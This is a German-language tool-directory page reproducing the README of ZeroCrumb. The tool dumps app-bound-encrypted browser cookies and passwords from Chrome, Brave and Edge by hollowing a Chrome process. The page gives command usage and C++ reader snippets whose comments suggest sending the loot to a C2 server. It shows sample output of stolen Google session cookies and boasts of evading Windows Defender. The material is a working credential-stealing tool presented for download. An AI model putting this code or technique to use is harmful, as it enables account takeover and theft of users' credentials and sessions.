Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ZeroCrumb — Dumping App Bound geschützter Anmeldedaten & Cookies ohne Berechtigungen. | Kitploit
Tools/GitHubGitHub/internetangel/zerocrumb
Passwort-CrackingExploitationLaterale BewegungDatenexfiltrationPost-ExploitationWebsicherheitMalware-AnalyseCommand and ControlRed Teaming
GitHubinternetangel/zerocrumb

ZeroCrumb

Dumping App Bound geschützter Anmeldedaten & Cookies ohne Berechtigungen.

16918vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

ZeroCrumb

Auslesen von App-gebundenen geschützten Anmeldeinformationen und Cookies ohne Berechtigungen.

Erläuterung

ZeroCrumb umgeht den Chrome Elevation Service, indem es eine Chrome-Instanz mittels Transacted Hollowing imitiert. Dadurch kann die IElevator-COM-Schnittstelle genutzt werden, um den App-gebundenen Schlüssel zu entschlüsseln.

Anschließend sendet der im ausgehöhlten Chrome-Prozess laufende Schlüsseldumper den entschlüsselten Schlüssel über eine Named Pipe an ZeroCrumb zurück.

Danach entschlüsselt ZeroCrumb die Cookies/Passwörter des angegebenen Browsers mit dem zuvor abgerufenen Schlüssel.

Vorteile des Named-Pipe-Ansatzes

Die Verwendung von Named Pipes in ZeroCrumb erlaubt es jedem Programm, das die Windows-API nutzen kann, sich mit der ZeroCrumb-Named-Pipe zu verbinden und den App-gebundenen Schlüssel daraus auszulesen.

Verwendung von ZeroCrumb als Bibliothek

Wenn Sie ZeroCrumb als Bibliothek verwenden möchten, müssen Sie eine DLL kompilieren, die eine Funktion exportiert, die das Aushöhlen von Chrome mit dem Schlüsseldumper durchführt. Möglicherweise müssen Sie auch die ausführbare Datei des Schlüsseldumpers in den .rsrc-Abschnitt der kompilierten DLL einbetten und später mit den Windows-APIs für Anwendungsressourcen abrufen.

Nutzung

Sie können dies in einem beliebigen Verzeichnis ausführen, solange sich der Schlüsseldumper im selben Verzeichnis befindet.

root@kitploit:~
ZeroCrumb.exe <BROWSER_TYPE> <DUMP_TYPE>
root@kitploit:~
Browser-Typen:
Chrome -> 0
Brave -> 1
Edge -> 2

Dump-Typen:
Cookies
Passwörter

Code-Nutzung

ZeroCrumb bietet einfach zu verwendende CookieReader- und PasswordReader-Klassen:

root@kitploit:~
    auto reader = new CookieReader(cookiesPath.c_str(), key);

    reader->initSqliteDb();
    reader->prepare(queries::cookies);
    reader->populateCookies();
    
    for (auto& cookie : reader->cookies) {
        string name = cookie->name;
        string site = cookie->site;
        string path = cookie->path;
        string cookieValue = cookie->cookie;
        // in Datei schreiben, an C2 senden usw.
    }
root@kitploit:~
    // beachten Sie: Passwörter sind (noch) nicht mit dem App-gebundenen Schlüssel verschlüsselt
    auto reader = new PasswordReader(passwordsPath.c_str(), key);

    reader->initSqliteDb();
    reader->prepare(queries::passwords);
    reader->populatePasswords();

    for (auto& password : reader->passwords) {

      auto name = password->name;
      auto site = password->site;
      auto passwordValue = password->password;
      // in Datei schreiben, an C2 senden usw.
    }

Abhängigkeiten

ZeroCrumb benötigt zwei Vcpkg-Abhängigkeiten:

root@kitploit:~
sqlite3
libsodium

Ausgabebeispiel

root@kitploit:~
$ ZeroCrumb.exe 0 Cookies
[*] Reading From Pipe...
App Bound Key: 980f8ea8af3299d966a26242.....
============
Name: SIDCC
Site: .google.com
Path: /
Cookie: AKEyXzXxD19T0KLMkrMC-eUXkrnEFi92OXq6rj1vydvmdL73olBVQGRQ4cG_hK5sqPhO1rLd1CM
============
Name: __Secure-1PSIDCC
Site: .google.com
Path: /
Cookie: AKEyXzXXC8_MNDlVbAaw512aXu-QJkl0uKNW66rhjeufotzoJhT3OPN5TuCQnfKS8l57_WGfDw
============
Name: __Secure-3PSIDCC
Site: .google.com
Path: /
Cookie: AKEyXzVVySM4FWl9itegCN2evcSmBvGc7_iXHqkKZ6VYPKmR--_LsHx1Aflar6SU4nyJiDaFq028
============
Name: udid
Site: .veepn.com
Path: /
Cookie: 0dd5b8bb-8c5b-47f3-87f9-1db8fa7d885f
============

Hinweise

Sie können ZeroCrumb so anpassen, dass es mit beliebigen anderen Anmeldeinformationen als Cookies und Passwörtern arbeitet.

Probleme

  • Der Debug-Build gibt nicht den korrekten Schlüssel aus.

Haftungsausschluss

Dies ist keineswegs die heimlichste Implementierung dieser Umgehung. Sie kann erkannt werden, indem nach bestimmten Zeichenfolgen gesucht, APIs gehooked usw. wird.

Zum Zeitpunkt meines Tests wurde Windows Defender umgangen, aber ich habe andere Antivirenprogramme nicht überprüft.

Ich überlasse es dem Benutzer, die Umgehung noch unauffälliger zu gestalten, falls diese Implementierung in Zukunft per Signatur erkannt wird.

Danksagungen

Transacted Hollowing von hasherezade.

App Bound Encryption Decryption von Xaitax.

Tool herunterladen